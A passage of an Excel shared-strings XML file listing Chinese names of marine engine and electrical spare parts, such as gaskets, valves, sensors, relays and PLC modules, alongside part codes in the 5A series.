  <si>
    <t xml:space="preserve">矩形垫片                                              </t>
  </si>
  <si>
    <t xml:space="preserve">椭圆形垫片                                             </t>
  </si>
  <si>
    <t xml:space="preserve">橡胶椭圆形垫片                                           </t>
  </si>
  <si>
    <t xml:space="preserve">纤维垫片                                              </t>
  </si>
  <si>
    <t xml:space="preserve">橡胶垫片                                              </t>
  </si>
  <si>
    <t xml:space="preserve">毡包垫片                                              </t>
  </si>
  <si>
    <t xml:space="preserve">排气垫片                                              </t>
  </si>
  <si>
    <t xml:space="preserve">椭圆形边垫片                                            </t>
  </si>
  <si>
    <t xml:space="preserve">O型密封圈                                             </t>
  </si>
  <si>
    <t xml:space="preserve">正方形截面密封环                                          </t>
  </si>
  <si>
    <t xml:space="preserve">圆形密封材料                                            </t>
  </si>
  <si>
    <t xml:space="preserve">D形环                                               </t>
  </si>
  <si>
    <t xml:space="preserve">X形环                                               </t>
  </si>
  <si>
    <t xml:space="preserve">石棉线                                               </t>
  </si>
  <si>
    <t xml:space="preserve">杯形垫片                                              </t>
  </si>
  <si>
    <t xml:space="preserve">密封剂                                               </t>
  </si>
  <si>
    <t xml:space="preserve">润滑剂                                               </t>
  </si>
  <si>
    <t xml:space="preserve">粘接剂                                               </t>
  </si>
  <si>
    <t xml:space="preserve">六角螺母衬套                                            </t>
  </si>
  <si>
    <t xml:space="preserve">直通公/母螺纹转接头                                        </t>
  </si>
  <si>
    <t xml:space="preserve">直通公/公螺纹转接头                                        </t>
  </si>
  <si>
    <t xml:space="preserve">直通母/母螺纹转接头                                        </t>
  </si>
  <si>
    <t xml:space="preserve">三通插孔                                              </t>
  </si>
  <si>
    <t xml:space="preserve">直螺柱接头                                             </t>
  </si>
  <si>
    <t xml:space="preserve">鼓形螺丝                                              </t>
  </si>
  <si>
    <t xml:space="preserve">螺纹连接的三通                                           </t>
  </si>
  <si>
    <t xml:space="preserve">直螺纹连接                                             </t>
  </si>
  <si>
    <t xml:space="preserve">鼓形接头外壳                                            </t>
  </si>
  <si>
    <t xml:space="preserve">衬套接头螺母                                            </t>
  </si>
  <si>
    <t xml:space="preserve">管子衬套                                              </t>
  </si>
  <si>
    <t xml:space="preserve">快速接头部件                                            </t>
  </si>
  <si>
    <t xml:space="preserve">波纹管                                               </t>
  </si>
  <si>
    <t xml:space="preserve">锥管                                                </t>
  </si>
  <si>
    <t xml:space="preserve">直通阀                                               </t>
  </si>
  <si>
    <t xml:space="preserve">蝶阀详图                                              </t>
  </si>
  <si>
    <t xml:space="preserve">控制阀安装板                                            </t>
  </si>
  <si>
    <t xml:space="preserve">两位三通控制阀                                           </t>
  </si>
  <si>
    <t xml:space="preserve">两位三通阀                                             </t>
  </si>
  <si>
    <t xml:space="preserve">螺纹连接球阀                                            </t>
  </si>
  <si>
    <t xml:space="preserve">密封接头螺母                                            </t>
  </si>
  <si>
    <t xml:space="preserve">卸放活塞                                              </t>
  </si>
  <si>
    <t xml:space="preserve">滤器阀控制器                                            </t>
  </si>
  <si>
    <t xml:space="preserve">带法兰的喷嘴                                            </t>
  </si>
  <si>
    <t xml:space="preserve">外螺纹喷嘴                                             </t>
  </si>
  <si>
    <t xml:space="preserve">内螺纹喷嘴                                             </t>
  </si>
  <si>
    <t xml:space="preserve">孔塞                                                </t>
  </si>
  <si>
    <t xml:space="preserve">带法兰的孔塞                                            </t>
  </si>
  <si>
    <t xml:space="preserve">外螺纹孔塞                                             </t>
  </si>
  <si>
    <t xml:space="preserve">节流孔法兰                                             </t>
  </si>
  <si>
    <t xml:space="preserve">膨胀衬套                                              </t>
  </si>
  <si>
    <t xml:space="preserve">气动液力泵                                             </t>
  </si>
  <si>
    <r>
      <t>修理工具</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color indexed="18"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">                                            </t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t xml:space="preserve">压力表支座                                             </t>
  </si>
  <si>
    <t xml:space="preserve">压力表单元                                             </t>
  </si>
  <si>
    <t xml:space="preserve">量尺                                                </t>
  </si>
  <si>
    <t xml:space="preserve">直液体温度计                                            </t>
  </si>
  <si>
    <t xml:space="preserve">导热膏                                               </t>
  </si>
  <si>
    <t xml:space="preserve">901部套铭牌                                           </t>
  </si>
  <si>
    <t xml:space="preserve">902部套铭牌                                           </t>
  </si>
  <si>
    <t xml:space="preserve">903部套铭牌                                           </t>
  </si>
  <si>
    <t xml:space="preserve">904部套铭牌                                           </t>
  </si>
  <si>
    <t xml:space="preserve">905部套铭牌                                           </t>
  </si>
  <si>
    <t xml:space="preserve">906部套铭牌                                           </t>
  </si>
  <si>
    <t xml:space="preserve">907部套铭牌                                           </t>
  </si>
  <si>
    <t xml:space="preserve">908部套铭牌                                           </t>
  </si>
  <si>
    <t xml:space="preserve">909部套铭牌                                           </t>
  </si>
  <si>
    <t xml:space="preserve">910部套铭牌                                           </t>
  </si>
  <si>
    <t xml:space="preserve">912部套铭牌                                           </t>
  </si>
  <si>
    <t xml:space="preserve">中间盒                                               </t>
  </si>
  <si>
    <t xml:space="preserve">零件存储箱                                             </t>
  </si>
  <si>
    <t xml:space="preserve">转接箱                                               </t>
  </si>
  <si>
    <t xml:space="preserve">发电机管理系统                                           </t>
  </si>
  <si>
    <t xml:space="preserve">电压监控单元                                            </t>
  </si>
  <si>
    <t xml:space="preserve">电脑接口                                              </t>
  </si>
  <si>
    <t xml:space="preserve">CD光盘，软件                                           </t>
  </si>
  <si>
    <t xml:space="preserve">电子部件                                              </t>
  </si>
  <si>
    <t>护罩</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t xml:space="preserve">绝缘线                                               </t>
  </si>
  <si>
    <t xml:space="preserve">电缆填料函，变径块                                         </t>
  </si>
  <si>
    <t xml:space="preserve">电缆填料函，锁紧螺母                                        </t>
  </si>
  <si>
    <t xml:space="preserve">电缆填料函，盲堵头                                         </t>
  </si>
  <si>
    <t xml:space="preserve">电缆填料函，附件                                          </t>
  </si>
  <si>
    <t xml:space="preserve">保险丝，外壳                                            </t>
  </si>
  <si>
    <t xml:space="preserve">自动复位保险丝                                           </t>
  </si>
  <si>
    <t xml:space="preserve">电缆扎带                                              </t>
  </si>
  <si>
    <t xml:space="preserve">线数                                                </t>
  </si>
  <si>
    <t xml:space="preserve">电路板插头接头                                           </t>
  </si>
  <si>
    <t xml:space="preserve">附件接头                                              </t>
  </si>
  <si>
    <t xml:space="preserve">布线管盖子                                             </t>
  </si>
  <si>
    <t xml:space="preserve">电缆接线套                                             </t>
  </si>
  <si>
    <t xml:space="preserve">绝缘块                                               </t>
  </si>
  <si>
    <t xml:space="preserve">PVC护套                                             </t>
  </si>
  <si>
    <t xml:space="preserve">阶梯形线盘                                             </t>
  </si>
  <si>
    <t xml:space="preserve">照明                                                </t>
  </si>
  <si>
    <t xml:space="preserve">接线盒总成                                             </t>
  </si>
  <si>
    <t xml:space="preserve">机加工附件                                             </t>
  </si>
  <si>
    <t xml:space="preserve">基板附件                                              </t>
  </si>
  <si>
    <t xml:space="preserve">扶手附件                                              </t>
  </si>
  <si>
    <t xml:space="preserve">配件附件                                              </t>
  </si>
  <si>
    <t xml:space="preserve">自锁件                                               </t>
  </si>
  <si>
    <t xml:space="preserve">离开                                                </t>
  </si>
  <si>
    <t xml:space="preserve">白色灯罩                                              </t>
  </si>
  <si>
    <t xml:space="preserve">红色灯罩                                              </t>
  </si>
  <si>
    <t xml:space="preserve">黄色灯罩                                              </t>
  </si>
  <si>
    <t xml:space="preserve">绿色灯罩                                              </t>
  </si>
  <si>
    <t xml:space="preserve">蓝色灯罩                                              </t>
  </si>
  <si>
    <t>5A0000</t>
  </si>
  <si>
    <t>5A0001</t>
  </si>
  <si>
    <t xml:space="preserve">自动调压装置                                            </t>
  </si>
  <si>
    <t>5A0010</t>
  </si>
  <si>
    <t xml:space="preserve">压差开关                                              </t>
  </si>
  <si>
    <t>5A0011</t>
  </si>
  <si>
    <t>5A0020</t>
  </si>
  <si>
    <t>5A0021</t>
  </si>
  <si>
    <t>5A0022</t>
  </si>
  <si>
    <t xml:space="preserve">仪表法兰                                              </t>
  </si>
  <si>
    <t>5A0023</t>
  </si>
  <si>
    <t>5A0024</t>
  </si>
  <si>
    <t>5A0025</t>
  </si>
  <si>
    <t xml:space="preserve">安装板                                               </t>
  </si>
  <si>
    <t>5A0029</t>
  </si>
  <si>
    <t>5A0100</t>
  </si>
  <si>
    <t>5A0102</t>
  </si>
  <si>
    <t xml:space="preserve">传感器安装座                                            </t>
  </si>
  <si>
    <t>5A0107</t>
  </si>
  <si>
    <t>5A0108</t>
  </si>
  <si>
    <t xml:space="preserve">排气温度传感器                                           </t>
  </si>
  <si>
    <t>5A0110</t>
  </si>
  <si>
    <t xml:space="preserve">轴承温度传感器                                           </t>
  </si>
  <si>
    <t>5A0120</t>
  </si>
  <si>
    <t xml:space="preserve">镍铬传感器                                             </t>
  </si>
  <si>
    <t>5A0130</t>
  </si>
  <si>
    <t>5A0140</t>
  </si>
  <si>
    <t xml:space="preserve">复合温度计                                             </t>
  </si>
  <si>
    <t>5A0141</t>
  </si>
  <si>
    <t xml:space="preserve">双螺距发送器                                            </t>
  </si>
  <si>
    <t>5A0200</t>
  </si>
  <si>
    <t xml:space="preserve">位移传感器                                             </t>
  </si>
  <si>
    <t>5A0210</t>
  </si>
  <si>
    <t>5A0220</t>
  </si>
  <si>
    <t xml:space="preserve">编码器                                               </t>
  </si>
  <si>
    <t>5A0225</t>
  </si>
  <si>
    <t xml:space="preserve">推进带                                               </t>
  </si>
  <si>
    <t>5A0229</t>
  </si>
  <si>
    <t xml:space="preserve">位置传感器                                             </t>
  </si>
  <si>
    <t>5A0230</t>
  </si>
  <si>
    <t>5A0234</t>
  </si>
  <si>
    <t xml:space="preserve">泄漏传感器                                             </t>
  </si>
  <si>
    <t>5A0250</t>
  </si>
  <si>
    <t xml:space="preserve">液位传感器                                             </t>
  </si>
  <si>
    <t>5A0260</t>
  </si>
  <si>
    <t>5A0261</t>
  </si>
  <si>
    <t>5A0290</t>
  </si>
  <si>
    <t xml:space="preserve">保护套                                               </t>
  </si>
  <si>
    <t>5A0291</t>
  </si>
  <si>
    <t xml:space="preserve">安装件                                               </t>
  </si>
  <si>
    <t>5A0292</t>
  </si>
  <si>
    <t>5A0293</t>
  </si>
  <si>
    <t>5A0294</t>
  </si>
  <si>
    <t>5A0295</t>
  </si>
  <si>
    <t>5A0400</t>
  </si>
  <si>
    <t xml:space="preserve">轴向振动                                              </t>
  </si>
  <si>
    <t>5A0401</t>
  </si>
  <si>
    <t>5A1000</t>
  </si>
  <si>
    <t xml:space="preserve">扁平电缆                                              </t>
  </si>
  <si>
    <t>5A1001</t>
  </si>
  <si>
    <t xml:space="preserve">双绞线                                               </t>
  </si>
  <si>
    <t>5A1002</t>
  </si>
  <si>
    <t xml:space="preserve">电线                                                </t>
  </si>
  <si>
    <t>5A1010</t>
  </si>
  <si>
    <t xml:space="preserve">电源线                                               </t>
  </si>
  <si>
    <t>5A1020</t>
  </si>
  <si>
    <t xml:space="preserve">接口电缆数据                                            </t>
  </si>
  <si>
    <t>5A1030</t>
  </si>
  <si>
    <t xml:space="preserve">电缆标记                                              </t>
  </si>
  <si>
    <t>5A1100</t>
  </si>
  <si>
    <t xml:space="preserve">电线标记                                              </t>
  </si>
  <si>
    <t>5A1101</t>
  </si>
  <si>
    <t xml:space="preserve">热缩管                                               </t>
  </si>
  <si>
    <t>5A1102</t>
  </si>
  <si>
    <t>5A1103</t>
  </si>
  <si>
    <t xml:space="preserve">保护软管                                              </t>
  </si>
  <si>
    <t>5A1104</t>
  </si>
  <si>
    <t>5A1110</t>
  </si>
  <si>
    <t xml:space="preserve">电线结                                               </t>
  </si>
  <si>
    <t>5A1111</t>
  </si>
  <si>
    <t xml:space="preserve">行带                                                </t>
  </si>
  <si>
    <t>5A1112</t>
  </si>
  <si>
    <t>5A1120</t>
  </si>
  <si>
    <t xml:space="preserve">电缆槽                                               </t>
  </si>
  <si>
    <t>5A1121</t>
  </si>
  <si>
    <t xml:space="preserve">绕性电缆槽                                             </t>
  </si>
  <si>
    <t>5A1122</t>
  </si>
  <si>
    <t xml:space="preserve">电缆管                                               </t>
  </si>
  <si>
    <t>5A1123</t>
  </si>
  <si>
    <t xml:space="preserve">电缆盘，附件                                            </t>
  </si>
  <si>
    <t>5A1129</t>
  </si>
  <si>
    <t>5A1130</t>
  </si>
  <si>
    <t xml:space="preserve">电缆填料函                                             </t>
  </si>
  <si>
    <t>5A1200</t>
  </si>
  <si>
    <t xml:space="preserve">切口环                                               </t>
  </si>
  <si>
    <t>5A1201</t>
  </si>
  <si>
    <t xml:space="preserve">止动塞                                               </t>
  </si>
  <si>
    <t>5A1202</t>
  </si>
  <si>
    <t xml:space="preserve">电缆填料函螺母                                           </t>
  </si>
  <si>
    <t>5A1205</t>
  </si>
  <si>
    <t>5A1210</t>
  </si>
  <si>
    <t>5A2000</t>
  </si>
  <si>
    <t xml:space="preserve">预制接线盒                                             </t>
  </si>
  <si>
    <t>5A2001</t>
  </si>
  <si>
    <t xml:space="preserve">柜                                                 </t>
  </si>
  <si>
    <t>5A2010</t>
  </si>
  <si>
    <t xml:space="preserve">预制电柜                                              </t>
  </si>
  <si>
    <t>5A2011</t>
  </si>
  <si>
    <t>5A2091</t>
  </si>
  <si>
    <t xml:space="preserve">橡胶减震器                                             </t>
  </si>
  <si>
    <t>5A2092</t>
  </si>
  <si>
    <t xml:space="preserve">行终端器                                              </t>
  </si>
  <si>
    <t>5A2100</t>
  </si>
  <si>
    <t xml:space="preserve">端制动                                               </t>
  </si>
  <si>
    <t>5A2101</t>
  </si>
  <si>
    <t>5A2102</t>
  </si>
  <si>
    <t xml:space="preserve">保险丝端扭                                             </t>
  </si>
  <si>
    <t>5A2103</t>
  </si>
  <si>
    <t xml:space="preserve">电桥                                                </t>
  </si>
  <si>
    <t>5A2104</t>
  </si>
  <si>
    <t xml:space="preserve">标记                                                </t>
  </si>
  <si>
    <t>5A2105</t>
  </si>
  <si>
    <t xml:space="preserve">测试插头                                              </t>
  </si>
  <si>
    <t>5A2106</t>
  </si>
  <si>
    <t xml:space="preserve">分开                                                </t>
  </si>
  <si>
    <t>5A2107</t>
  </si>
  <si>
    <t xml:space="preserve">进口接口                                              </t>
  </si>
  <si>
    <t>5A2108</t>
  </si>
  <si>
    <t xml:space="preserve">警告标记                                              </t>
  </si>
  <si>
    <t>5A2109</t>
  </si>
  <si>
    <t xml:space="preserve">光学耦合器                                             </t>
  </si>
  <si>
    <t>5A2110</t>
  </si>
  <si>
    <t xml:space="preserve">轨道安装                                              </t>
  </si>
  <si>
    <t>5A2120</t>
  </si>
  <si>
    <t>5A2200</t>
  </si>
  <si>
    <t xml:space="preserve">时间继电器                                             </t>
  </si>
  <si>
    <t>5A2201</t>
  </si>
  <si>
    <t>5A2202</t>
  </si>
  <si>
    <t xml:space="preserve">闭锁继电器                                             </t>
  </si>
  <si>
    <t>5A2203</t>
  </si>
  <si>
    <t xml:space="preserve">跟踪继电器                                             </t>
  </si>
  <si>
    <t>5A2204</t>
  </si>
  <si>
    <t xml:space="preserve">热继电器                                              </t>
  </si>
  <si>
    <t>5A2205</t>
  </si>
  <si>
    <t xml:space="preserve">接触器                                               </t>
  </si>
  <si>
    <t>5A2206</t>
  </si>
  <si>
    <t xml:space="preserve">限温开关                                              </t>
  </si>
  <si>
    <t>5A2207</t>
  </si>
  <si>
    <t xml:space="preserve">转速继电器                                             </t>
  </si>
  <si>
    <t>5A2208</t>
  </si>
  <si>
    <t xml:space="preserve">继电器插槽                                             </t>
  </si>
  <si>
    <t>5A2210</t>
  </si>
  <si>
    <t xml:space="preserve">扶手接头                                              </t>
  </si>
  <si>
    <t>5A2211</t>
  </si>
  <si>
    <t xml:space="preserve">继电器标签                                             </t>
  </si>
  <si>
    <t>5A2212</t>
  </si>
  <si>
    <t xml:space="preserve">限制继电器                                             </t>
  </si>
  <si>
    <t>5A2251</t>
  </si>
  <si>
    <t xml:space="preserve">计算器继电器                                            </t>
  </si>
  <si>
    <t>5A2252</t>
  </si>
  <si>
    <t xml:space="preserve">信号隔离器                                             </t>
  </si>
  <si>
    <t>5A2253</t>
  </si>
  <si>
    <t>5A2255</t>
  </si>
  <si>
    <t xml:space="preserve">电阻/电流转换器                                          </t>
  </si>
  <si>
    <t>5A2256</t>
  </si>
  <si>
    <t>5A2257</t>
  </si>
  <si>
    <t xml:space="preserve">传感器放大器                                            </t>
  </si>
  <si>
    <t>5A2260</t>
  </si>
  <si>
    <t xml:space="preserve">传感器限制器                                            </t>
  </si>
  <si>
    <t>5A2261</t>
  </si>
  <si>
    <t xml:space="preserve">传感器滤波器                                            </t>
  </si>
  <si>
    <t>5A2262</t>
  </si>
  <si>
    <t>5A2270</t>
  </si>
  <si>
    <t>5A2271</t>
  </si>
  <si>
    <t>5A2300</t>
  </si>
  <si>
    <t xml:space="preserve">母插头                                               </t>
  </si>
  <si>
    <t>5A2301</t>
  </si>
  <si>
    <t xml:space="preserve">公插头                                               </t>
  </si>
  <si>
    <t>5A2302</t>
  </si>
  <si>
    <t xml:space="preserve">插脚编号                                              </t>
  </si>
  <si>
    <t>5A2303</t>
  </si>
  <si>
    <t xml:space="preserve">弯触点                                               </t>
  </si>
  <si>
    <t>5A2304</t>
  </si>
  <si>
    <t>5A2305</t>
  </si>
  <si>
    <t xml:space="preserve">角型插头                                              </t>
  </si>
  <si>
    <t>5A2306</t>
  </si>
  <si>
    <t xml:space="preserve">插头垫片                                              </t>
  </si>
  <si>
    <t>5A2307</t>
  </si>
  <si>
    <t xml:space="preserve">弹簧加载插头                                            </t>
  </si>
  <si>
    <t>5A2310</t>
  </si>
  <si>
    <t xml:space="preserve">AP仪表板                                             </t>
  </si>
  <si>
    <t>5A3003</t>
  </si>
  <si>
    <t xml:space="preserve">前端标记                                              </t>
  </si>
  <si>
    <t>5A3009</t>
  </si>
  <si>
    <t xml:space="preserve">应急车钟仪表板                                           </t>
  </si>
  <si>
    <t>5A3060</t>
  </si>
  <si>
    <t xml:space="preserve">信号铃                                               </t>
  </si>
  <si>
    <t>5A3061</t>
  </si>
  <si>
    <t xml:space="preserve">旋转闪光灯                                             </t>
  </si>
  <si>
    <t>5A3062</t>
  </si>
  <si>
    <t xml:space="preserve">应急车钟箱                                             </t>
  </si>
  <si>
    <t>5A3063</t>
  </si>
  <si>
    <t xml:space="preserve">控制箱电轴                                             </t>
  </si>
  <si>
    <t>5A3070</t>
  </si>
  <si>
    <t xml:space="preserve">操纵手柄                                              </t>
  </si>
  <si>
    <t>5A3080</t>
  </si>
  <si>
    <t xml:space="preserve">限位板设备                                             </t>
  </si>
  <si>
    <t>5A3089</t>
  </si>
  <si>
    <t xml:space="preserve">启动箱                                               </t>
  </si>
  <si>
    <t>5A3090</t>
  </si>
  <si>
    <t xml:space="preserve">报警板                                               </t>
  </si>
  <si>
    <t>5A3091</t>
  </si>
  <si>
    <t xml:space="preserve">Q80仪表                                             </t>
  </si>
  <si>
    <t>5A3100</t>
  </si>
  <si>
    <t xml:space="preserve">Q96仪表                                             </t>
  </si>
  <si>
    <t>5A3101</t>
  </si>
  <si>
    <t xml:space="preserve">Q144仪表                                            </t>
  </si>
  <si>
    <t>5A3102</t>
  </si>
  <si>
    <t>5A3103</t>
  </si>
  <si>
    <t xml:space="preserve">Q48仪表                                             </t>
  </si>
  <si>
    <t>5A3104</t>
  </si>
  <si>
    <t xml:space="preserve">Q72仪表                                             </t>
  </si>
  <si>
    <t>5A3105</t>
  </si>
  <si>
    <t xml:space="preserve">仪表刻度                                              </t>
  </si>
  <si>
    <t>5A3108</t>
  </si>
  <si>
    <t xml:space="preserve">仪表图                                               </t>
  </si>
  <si>
    <t>5A3109</t>
  </si>
  <si>
    <t>5A3110</t>
  </si>
  <si>
    <t>5A3111</t>
  </si>
  <si>
    <t>5A3120</t>
  </si>
  <si>
    <t>5A3130</t>
  </si>
  <si>
    <t xml:space="preserve">Q96仪表标记                                           </t>
  </si>
  <si>
    <t>5A3190</t>
  </si>
  <si>
    <t xml:space="preserve">灯帽                                                </t>
  </si>
  <si>
    <t>5A3200</t>
  </si>
  <si>
    <t xml:space="preserve">指示钮                                               </t>
  </si>
  <si>
    <t>5A3202</t>
  </si>
  <si>
    <t>5A3203</t>
  </si>
  <si>
    <t>5A3204</t>
  </si>
  <si>
    <t>5A3205</t>
  </si>
  <si>
    <t xml:space="preserve">图例板                                               </t>
  </si>
  <si>
    <t>5A3206</t>
  </si>
  <si>
    <t xml:space="preserve">图例帽                                               </t>
  </si>
  <si>
    <t>5A3207</t>
  </si>
  <si>
    <t>5A3209</t>
  </si>
  <si>
    <t>5A3210</t>
  </si>
  <si>
    <t xml:space="preserve">连接盖                                               </t>
  </si>
  <si>
    <t>5A3211</t>
  </si>
  <si>
    <t xml:space="preserve">开关元件                                              </t>
  </si>
  <si>
    <t>5A3212</t>
  </si>
  <si>
    <t>5A3220</t>
  </si>
  <si>
    <t xml:space="preserve">应急停车                                              </t>
  </si>
  <si>
    <t>5A3221</t>
  </si>
  <si>
    <t xml:space="preserve">联锁开关                                              </t>
  </si>
  <si>
    <t>5A3222</t>
  </si>
  <si>
    <t>5A3223</t>
  </si>
  <si>
    <t xml:space="preserve">节点                                                </t>
  </si>
  <si>
    <t>5A3250</t>
  </si>
  <si>
    <t xml:space="preserve">定子                                                </t>
  </si>
  <si>
    <t>5A3251</t>
  </si>
  <si>
    <t xml:space="preserve">开槽螺母                                              </t>
  </si>
  <si>
    <t>5A3252</t>
  </si>
  <si>
    <t xml:space="preserve">螺母盖                                               </t>
  </si>
  <si>
    <t>5A3253</t>
  </si>
  <si>
    <t>5A3254</t>
  </si>
  <si>
    <t xml:space="preserve">制动装置                                              </t>
  </si>
  <si>
    <t>5A3255</t>
  </si>
  <si>
    <t xml:space="preserve">数字显示盘                                             </t>
  </si>
  <si>
    <t>5A3256</t>
  </si>
  <si>
    <t xml:space="preserve">调光器                                               </t>
  </si>
  <si>
    <t>5A3260</t>
  </si>
  <si>
    <t xml:space="preserve">电位器调光器                                            </t>
  </si>
  <si>
    <t>5A3261</t>
  </si>
  <si>
    <t>5A3262</t>
  </si>
  <si>
    <t>5A3280</t>
  </si>
  <si>
    <t xml:space="preserve">透镜拆卸工具                                            </t>
  </si>
  <si>
    <t>5A3281</t>
  </si>
  <si>
    <t xml:space="preserve">灯具拆卸工具                                            </t>
  </si>
  <si>
    <t>5A3282</t>
  </si>
  <si>
    <t xml:space="preserve">按钮信号                                              </t>
  </si>
  <si>
    <t>5A3290</t>
  </si>
  <si>
    <t xml:space="preserve">灯玻璃信号                                             </t>
  </si>
  <si>
    <t>5A3291</t>
  </si>
  <si>
    <t xml:space="preserve">PLC模块                                             </t>
  </si>
  <si>
    <t>5A4000</t>
  </si>
  <si>
    <t xml:space="preserve">存储器                                               </t>
  </si>
  <si>
    <t>5A4001</t>
  </si>
  <si>
    <t xml:space="preserve">PLC电源                                             </t>
  </si>
  <si>
    <t>5A4002</t>
  </si>
  <si>
    <t xml:space="preserve">PLC扩展基本单元                                         </t>
  </si>
  <si>
    <t>5A4003</t>
  </si>
  <si>
    <t xml:space="preserve">模拟模块                                              </t>
  </si>
  <si>
    <t>5A4004</t>
  </si>
  <si>
    <t xml:space="preserve">数字模型                                              </t>
  </si>
  <si>
    <t>5A4005</t>
  </si>
  <si>
    <t xml:space="preserve">过滤组件                                              </t>
  </si>
  <si>
    <t>5A4006</t>
  </si>
  <si>
    <t xml:space="preserve">转速模块                                              </t>
  </si>
  <si>
    <t>5A4007</t>
  </si>
  <si>
    <t xml:space="preserve">串形接口模块                                            </t>
  </si>
  <si>
    <t>5A4008</t>
  </si>
  <si>
    <t xml:space="preserve">管接头组件                                             </t>
  </si>
  <si>
    <t>5A4009</t>
  </si>
  <si>
    <t xml:space="preserve">印刷板                                               </t>
  </si>
  <si>
    <t>5A4010</t>
  </si>
  <si>
    <t xml:space="preserve">印刷板固定器                                            </t>
  </si>
  <si>
    <t>5A4011</t>
  </si>
  <si>
    <t xml:space="preserve">PLC基本单元                                           </t>
  </si>
  <si>
    <t>5A4012</t>
  </si>
  <si>
    <t xml:space="preserve">BM2-模式                                            </t>
  </si>
  <si>
    <t>5A4020</t>
  </si>
  <si>
    <t xml:space="preserve">BM-模式                                             </t>
  </si>
  <si>
    <t>5A4021</t>
  </si>
  <si>
    <t xml:space="preserve">OM模式                                              </t>
  </si>
  <si>
    <t>5A4022</t>
  </si>
  <si>
    <t xml:space="preserve">模块                                                </t>
  </si>
  <si>
    <t>5A4040</t>
  </si>
  <si>
    <t xml:space="preserve">手持编程器                                             </t>
  </si>
  <si>
    <t>5A4060</t>
  </si>
  <si>
    <t xml:space="preserve">数字式速度控制                                           </t>
  </si>
  <si>
    <t>5A4061</t>
  </si>
  <si>
    <t xml:space="preserve">发电机负荷传感器                                          </t>
  </si>
  <si>
    <t>5A4062</t>
  </si>
  <si>
    <t>5A4070</t>
  </si>
  <si>
    <t xml:space="preserve">电脑                                                </t>
  </si>
  <si>
    <t>5A4071</t>
  </si>
  <si>
    <t xml:space="preserve">监测器                                               </t>
  </si>
  <si>
    <t>5A4072</t>
  </si>
  <si>
    <t xml:space="preserve">打印机                                               </t>
  </si>
  <si>
    <t>5A4073</t>
  </si>
  <si>
    <t xml:space="preserve">电脑附件                                              </t>
  </si>
  <si>
    <t>5A4074</t>
  </si>
  <si>
    <t xml:space="preserve">鼠标                                                </t>
  </si>
  <si>
    <t>5A4075</t>
  </si>
  <si>
    <t xml:space="preserve">轨迹球                                               </t>
  </si>
  <si>
    <t>5A4076</t>
  </si>
  <si>
    <t xml:space="preserve">船用电脑                                              </t>
  </si>
  <si>
    <t>5A4077</t>
  </si>
  <si>
    <t xml:space="preserve">船用显示器                                             </t>
  </si>
  <si>
    <t>5A4078</t>
  </si>
  <si>
    <t>5A4100</t>
  </si>
  <si>
    <t xml:space="preserve">二极管                                               </t>
  </si>
  <si>
    <t>5A4101</t>
  </si>
  <si>
    <t>5A4102</t>
  </si>
  <si>
    <t>5A4103</t>
  </si>
  <si>
    <t xml:space="preserve">晶体管                                               </t>
  </si>
  <si>
    <t>5A4104</t>
  </si>
  <si>
    <t>5A4110</t>
  </si>
  <si>
    <t xml:space="preserve">电位计马达                                             </t>
  </si>
  <si>
    <t>5A4115</t>
  </si>
  <si>
    <t xml:space="preserve">火花塞伸长部                                            </t>
  </si>
  <si>
    <t>5A4120</t>
  </si>
  <si>
    <t xml:space="preserve">高压部件                                              </t>
  </si>
  <si>
    <t>5A4121</t>
  </si>
  <si>
    <t>5A4122</t>
  </si>
  <si>
    <t xml:space="preserve">点火系统                                              </t>
  </si>
  <si>
    <t>5A4123</t>
  </si>
  <si>
    <t>5A4180</t>
  </si>
  <si>
    <t xml:space="preserve">万用表                                               </t>
  </si>
  <si>
    <t>5A4181</t>
  </si>
  <si>
    <t xml:space="preserve">校准器                                               </t>
  </si>
  <si>
    <t>5A4182</t>
  </si>
  <si>
    <t xml:space="preserve">黄铜标记                                              </t>
  </si>
  <si>
    <t>5A4191</t>
  </si>
  <si>
    <t xml:space="preserve">标签粘接剂                                             </t>
  </si>
  <si>
    <t>5A4194</t>
  </si>
  <si>
    <t xml:space="preserve">线性驱动器                                             </t>
  </si>
  <si>
    <t>5A4200</t>
  </si>
  <si>
    <t xml:space="preserve">电动/气动转换器                                          </t>
  </si>
  <si>
    <t>5A4201</t>
  </si>
  <si>
    <t xml:space="preserve">输出功率传感器                                           </t>
  </si>
  <si>
    <t>5A4203</t>
  </si>
  <si>
    <t>5A4204</t>
  </si>
  <si>
    <t>5A4210</t>
  </si>
  <si>
    <t>5A4211</t>
  </si>
  <si>
    <t xml:space="preserve">特殊圆柱销钉                                            </t>
  </si>
  <si>
    <t xml:space="preserve">摩擦式安全接头                                           </t>
  </si>
  <si>
    <t xml:space="preserve">套筒接头                                              </t>
  </si>
  <si>
    <t xml:space="preserve">弹性联轴器                                             </t>
  </si>
  <si>
    <t xml:space="preserve">可转接头                                              </t>
  </si>
  <si>
    <t xml:space="preserve">接头部件                                              </t>
  </si>
  <si>
    <t xml:space="preserve">球形铰链                                              </t>
  </si>
  <si>
    <t xml:space="preserve">叉型接头端部                                            </t>
  </si>
  <si>
    <t xml:space="preserve">球形手柄                                              </t>
  </si>
  <si>
    <t xml:space="preserve">单链轮                                               </t>
  </si>
  <si>
    <t xml:space="preserve">内外链节                                              </t>
  </si>
  <si>
    <t xml:space="preserve">锁扣链                                               </t>
  </si>
  <si>
    <t xml:space="preserve">瓜子链                                               </t>
  </si>
  <si>
    <t xml:space="preserve">带工具螺纹的紧配螺栓                                        </t>
  </si>
  <si>
    <t xml:space="preserve">特殊头螺丝                                             </t>
  </si>
  <si>
    <t xml:space="preserve">泄放螺钉                                              </t>
  </si>
  <si>
    <t xml:space="preserve">专用螺钉                                              </t>
  </si>
  <si>
    <t xml:space="preserve">双头螺柱                                              </t>
  </si>
  <si>
    <t xml:space="preserve">六角螺柱                                              </t>
  </si>
  <si>
    <t xml:space="preserve">带螺母螺柱                                             </t>
  </si>
  <si>
    <t xml:space="preserve">液压延伸螺柱                                            </t>
  </si>
  <si>
    <t xml:space="preserve">特殊螺柱                                              </t>
  </si>
  <si>
    <t xml:space="preserve">有锁紧钢丝的螺母                                          </t>
  </si>
  <si>
    <t xml:space="preserve">带螺母螺丝                                             </t>
  </si>
  <si>
    <t xml:space="preserve">特殊圆螺母                                             </t>
  </si>
  <si>
    <t xml:space="preserve">专用盘                                               </t>
  </si>
  <si>
